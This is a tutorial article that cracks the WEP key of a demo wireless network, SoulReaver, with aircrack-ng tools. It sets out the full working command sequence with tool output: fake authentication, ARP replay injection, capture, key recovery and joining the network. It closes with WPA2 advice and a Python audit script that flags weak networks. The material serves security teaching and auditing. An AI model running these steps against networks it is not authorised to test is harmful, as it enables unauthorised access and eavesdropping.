Wireless WEP (in)security

Wireless security has been a major concern for IT security professionals for at least a decade. It is difficult to protect something that you can't see, that goes through walls and that anyone close enough can eavesdrop on, especially when the only Wi-Fi security in place is the deprecated wireless encryption protocol WEP. In this article we will break the wireless security of a demo network and obtain its WEP key. We will use ARP injection to speed up this so-called WEP crack, and it will be so fast that from now on you will always have second thoughts about Wi-Fi security.

To illustrate the scenario we will use an old Linksys wireless PCMCIA network card and break into a wireless network called SoulReaver, created specially for this purpose and configured on a Linksys wireless router. The laptop on which the potentially malicious activity is performed has BackTrack preinstalled, and we will use an ARP injection technique to speed up the demonstration.

Once the operating system has booted, insert the card in the PCMCIA slot and you should see the following line in dmesg:

b43-phy0: Broadcom 4306 WLAN found

This means that the card has been successfully detected. Next we need to put the card in monitor mode so we can have a look around. This is achieved with the following commands:

# airmon-ng start wlan0
# airodump-ng wlan0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1A:70:FD:3A:76  -41        5       11    0   6  54e  WEP  WEP         SoulReaver

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 (not associated)   00:1D:E0:82:80:31  -74    0 - 1      3        4
 00:1A:70:FD:3A:76  00:21:5D:13:FE:56  -45   54e-54e    45       12

So there we see a wireless network called "SoulReaver" which is protected with WEP. At this point we could simply fire up a packet sniffer and wait until enough packets have been collected to crack the WEP key, but as we want to speed up the process we will use ARP injection to collect packets faster. For ARP injection to work, in most cases you first need to associate with the access point (aireplay-ng attack 1, fake authentication):

# aireplay-ng -1 0 -e SoulReaver -a 00:1A:70:FD:3A:76 -h 00:12:17:07:E0:15 wlan0

Then we can start listening for ARP requests and begin injecting as soon as we have captured at least one:

# aireplay-ng -3 -e SoulReaver -a 00:1A:70:FD:3A:76 -h 00:12:17:07:E0:15 -x 200 wlan0
16:06:22  Waiting for beacon frame (ESSID: SoulReaver) on channel 6
Found BSSID "00:1A:70:FD:3A:76" to given ESSID "SoulReaver".
Saving ARP requests in replay_arp-0709-160622.cap
You should also start airodump-ng to capture replies.
Read 7803 packets (got 1 ARP requests and 1173 ACKs), sent 1222 packets...(199 pps)

The command above selects the third aireplay-ng attack, ARP request replay (injection); -e and -a name the target network "SoulReaver" and its access point MAC address 00:1A:70:FD:3A:76, -h gives the source MAC address of our card, and -x 200 sets the injection rate to 200 packets per second. As the command output shows, aireplay-ng matches the BSSID to the given ESSID, locates the network on channel 6 and waits for a valid ARP request that can be replayed. Once such a packet is captured, the tool starts injecting at a rate of about 199 packets per second, and at this point we start dumping the traffic to a file:

# airodump-ng -c 6 --bssid 00:1A:70:FD:3A:76 -w SoulReaver-dump wlan0

The command above instructs airodump-ng to listen on channel 6 on interface wlan0, to keep only frames for the BSSID 00:1A:70:FD:3A:76, and to write the captured packets to a file called SoulReaver-dump-01.cap. Once we have captured enough packets, we can try to recover the key with the following command:

# aircrack-ng -a 1 -n 64 SoulReaver-dump*.cap

Here -a 1 selects WEP cracking and -n 64 tells aircrack-ng to try a 64-bit key first. If you have captured enough packets (unique IVs), after a short delay the following screen will appear:

                                     Aircrack-ng 1.0 rc3 r1552

                            [00:00:04] Tested 730859 keys (got 13883 IVs)

   KB    depth   byte(vote)
    0   22/ 32   F3(16384) 40(16128) 53(16128) 7D(16128) 93(16128) 97(16128) A2(16128)
    1    1/ 14   84(18944) AC(18432) FD(18432) 6E(17920) 5D(17664) B2(17664) 02(17664)
    2    0/ 12   0D(19968) 5D(19968) 25(18944) 7F(18688) A7(18688) 14(18688) 53(18176)
    3    4/ 10   86(18688) 62(18176) 97(18176) 38(17920) 4F(17664) 6D(17664) 1C(17408)
    4    1/ 14   52(19968) F9(19456) F0(18944) 9C(18688) B4(18176) FE(17920) 03(17664)

                         KEY FOUND! [ CB:74:0D:89:52 ]
	Decrypted correctly: 100%

To connect to the wireless network with the recovered WEP key, do the following:

# iwconfig wlan0 mode manage
# ifconfig wlan0 down
# iwconfig wlan0 essid SoulReaver key CB:74:0D:89:52
# ifconfig wlan0 up
# dhcpcd wlan0
# ping www.google.com


The recommended solution to WEP's security problems is to switch to WPA2 or, with older equipment, to the less resource-intensive WPA. Either is much more secure than WEP. To add support for WPA or WPA2, some old Wi-Fi access points might need to be replaced or have their firmware upgraded. WPA was designed as an interim, software-implementable replacement for WEP that could forestall the immediate deployment of new hardware. However, TKIP (the basis of WPA) has reached the end of its designed lifetime and has been deprecated in the next full release of the 802.11 standard.
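As an added example that is not part of the original article, the following Python script turns airodump-ng screen output like the scan shown earlier into a small audit report: WEP and open networks are flagged as the recommendation above suggests, and WPA with TKIP as a warning. The sample scan is constructed; only the SoulReaver row is taken from the article, the other BSSIDs and ESSIDs are made up.

```python
import re

# Constructed sample modelled on the airodump-ng scan in the article; only the SoulReaver row is real.
SAMPLE_SCAN = """\
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:1A:70:FD:3A:76  -41        5       11    0   6  54e  WEP  WEP         SoulReaver
 02:00:00:00:00:01  -60       12        3    0  11  54e  OPN              Guest WiFi
 02:00:00:00:00:02  -55       40      120    2   1  54   WPA2 CCMP   PSK  Office
 02:00:00:00:00:03  -70        8        0    0   6  54e  WPA  TKIP   PSK  Legacy-AP
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
"""

CIPHERS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP", "WRAP"}
AUTHS = {"PSK", "MGT", "SKA", "OPN"}
MAC = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)

def parse_access_points(text):
    """Parse the access-point table of airodump-ng's screen output into dicts."""
    aps = []
    for line in text.splitlines():
        tokens = line.split()
        if tokens[:2] == ["BSSID", "STATION"]:
            break  # the client table follows; not needed for the AP audit
        if len(tokens) < 9 or not MAC.match(tokens[0]):
            continue  # header line, blank line or malformed row
        rest = tokens[8:]  # CIPHER and AUTH may be blank, so consume them by value
        cipher = rest.pop(0) if rest and rest[0] in CIPHERS else ""
        auth = rest.pop(0) if rest and rest[0] in AUTHS else ""  # an ESSID literally "PSK" would be misread
        aps.append({"bssid": tokens[0], "channel": int(tokens[5]), "enc": tokens[7],
                    "cipher": cipher, "auth": auth, "essid": " ".join(rest)})
    return aps

def audit(aps):
    """Return (severity, essid, bssid, reason) for every AP with weak or no encryption."""
    findings = []
    for ap in aps:
        if ap["enc"] == "OPN":
            sev, why = "HIGH", "no encryption at all"
        elif ap["enc"] == "WEP":
            sev, why = "HIGH", "WEP key is recoverable from captured IVs"
        elif ap["cipher"] == "TKIP":
            sev, why = "MEDIUM", "TKIP (WPA) is deprecated; move to WPA2/CCMP"
        else:
            continue  # WPA2/CCMP (or better) is not reported
        findings.append((sev, ap["essid"], ap["bssid"], why))
    return findings

if __name__ == "__main__":
    print(*audit(parse_access_points(SAMPLE_SCAN)), sep="\n")
```

Feed it the saved screen output of a scan (or adapt the column handling to airodump-ng's CSV export) to get an inventory of networks still relying on WEP or TKIP.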
